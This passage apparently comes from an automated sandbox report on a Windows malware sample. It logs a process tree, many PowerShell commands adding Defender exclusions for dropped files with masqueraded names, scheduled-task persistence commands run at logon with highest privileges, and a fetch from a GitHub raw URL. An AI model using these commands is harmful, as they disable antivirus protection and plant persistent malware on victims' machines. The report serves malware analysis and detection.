    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wininit.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4380
    - - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Tasks\conhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2532
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\cmd.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1884
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3500
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Recent\conhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3612
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\spoolsv.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3688
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\LocalLow\Microsoft\unsecapp.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4168
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3892
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\unsecapp.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\OfficeClickToRun.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4252
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2944
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mhhnKjyV21.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2580
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1888
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3720
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5mXdMdden9.bat"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:668
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:4372
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EVfp7xrD4G.bat"
        10⤵
        
        PID:4848
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:2280
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n6bUdMbtqP.bat"
        12⤵
        
        PID:4768
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:468
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5088
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dIJBhaqFKS.bat"
        14⤵
        
        PID:1836
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        15⤵
        
        PID:628
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5004
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EVfp7xrD4G.bat"
        16⤵
        
        PID:1452
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        17⤵
        
        PID:3576
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3020
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qtVTp5BaF9.bat"
        18⤵
        
        PID:4968
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:1364
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1892
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OPH1A2PBmS.bat"
        20⤵
        
        PID:1996
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:1660
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Nflxmifgtk.bat"
        22⤵
        
        PID:4596
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:468
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2224
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3j9hYFnRH7.bat"
        24⤵
        
        PID:1648
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:1144
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HcCr6nEVp7.bat"
        26⤵
        
        PID:2356
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        27⤵
        
        PID:3576
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4372
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jFXOGCU6Cq.bat"
        28⤵
        
        PID:448
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        29⤵
        
        PID:1364
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dIJBhaqFKS.bat"
        30⤵
        
        PID:3480
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        31⤵
        
        PID:3044
        
        C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe
        
        "C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe"
        31⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\providercommon\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\providercommon\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\Public\Downloads\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\providercommon\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\providercommon\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\providercommon\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\Visualizations\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\Visualizations\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Windows\Tasks\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Tasks\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\Tasks\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\providercommon\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\providercommon\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\providercommon\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Recent\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Recent\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\LocalLow\Microsoft\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\LocalLow\Microsoft\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\LocalLow\Microsoft\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\providercommon\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\providercommon\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\providercommon\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\tracing\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\tracing\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Windows\tracing\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1004

Network

DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:24:54 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4223-LON
X-Cache: HIT
